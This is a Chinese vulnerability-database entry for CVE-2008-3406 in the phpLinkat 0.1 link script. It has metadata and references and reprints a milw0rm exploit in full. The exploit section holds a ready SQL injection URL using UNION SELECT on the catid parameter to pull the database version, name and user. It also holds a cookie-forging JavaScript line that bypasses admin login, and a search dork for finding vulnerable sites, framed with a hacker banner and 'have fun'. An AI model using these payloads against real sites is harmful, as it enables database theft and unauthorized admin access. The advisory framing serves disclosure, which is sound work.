phpLinkat SQL注入和Cookie认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115761 漏洞类型 SQL注入
发布时间 2008-07-26 更新时间 2009-01-29
CVE编号 CVE-2008-3406 CNNVD-ID CNNVD-200807-496
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6140
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-496
|漏洞详情
phpLinkat0.1版本中的showcat.php存在SQL注入漏洞。远程攻击者可以借助catid参数,执行任意的SQL指令。
|漏洞EXP
######## ##    ##  ######  ########  ##    ## ########  ########  #######  ######## 
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ######## 
################################ !R4Q!4N H4CK3R  ###################################
#
# phpLinkat 0.1 Insecure Cookie Handling Vulnerability & Sql Injection Exploit
#
# Founded By : Encrypt3d.M!nd
#              encrypt3d.blogspot.com
#
# Dork : "Powered by DesClub.com - phpLinkat"

# Description :
  
   phpLinkat is a free link indexing script written in PHP and
   runs on MySQL.This script is suffering a sql injection bug
   and insecure cookie handling.

# phpLinkat : Sql Injection Exploit
    PoC :www.site.com/phpLinkat/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/*

# phpLinkat : Insecure Cookie Handling
 
  /admin/login2.php: 
  6 : if( ($username == $cpusername) && ($password == $cppassword) ){
  7 :  setcookie("login","right");  <<< wtf!!
  8 :  echo <<<EOF
 Exploit:
  javascript:document.cookie = "login=right; path=/;";
  Then goto "phplinkat/admin/",and have fun ^_^

#End 

# milw0rm.com [2008-07-26]
|参考资料

来源:XF
名称:phplinkat-showcat-sql-injection(44060)
链接:http://xforce.iss.net/xforce/xfdb/44060
来源:BID
名称:30386
链接:http://www.securityfocus.com/bid/30386
来源:MILW0RM
名称:6140
链接:http://www.milw0rm.com/exploits/6140
来源:SREASON
名称:4087
链接:http://securityreason.com/securityalert/4087